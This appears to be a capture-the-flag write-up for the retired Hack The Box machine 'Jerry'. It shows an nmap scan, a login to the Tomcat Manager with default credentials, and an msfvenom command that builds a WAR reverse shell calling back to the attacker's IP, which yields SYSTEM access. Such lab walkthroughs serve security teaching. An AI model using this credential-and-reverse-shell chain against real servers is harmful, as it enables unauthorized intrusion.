Name: | Jerry |
---|---|
Release Date: | 30 Jun 2018 |
Retire Date: | 17 Nov 2019 |
OS: | Windows |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
echthros 00 days, 03 hours, 06 mins, 18 seconds | |
echthros 00 days, 03 hours, 06 mins, 29 seconds | |
Creator: | mrh4sh |
CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with nmap -sC -sV -oA -Pn ./jerry 10.10.10.95
$ nmap -sC -sV -Pn -oA ./jerry 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 10:37 EDT
Nmap scan report for 10.10.10.95
Host is up (0.070s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.08 seconds
There we go. We have a web page. Granted it's a the default Tomcat page, but it's something. Looking around, we find that the Manager App button takes us to http://10.10.10.95:8080/manager/html, but is asking for a password. A quick Google search finds several possible default credentials.
Trying a few, we get in successfully with tomcat:s3cret.
In the Manager App, we see an Upload WAR section that can quickly deploy WAR files. WAR files are basically zipped up JSP files. MSFVenom can build a WAR reverse shell payload using:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f war > shell.war
Upload that WAR file and deploy it. Then visit the newly created /[filename] directory. For me it was http://10.10.10.95:8080/shell. A quick whoami shows that we are already NT AUTHORITY\SYSTEM. Grab the flags at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt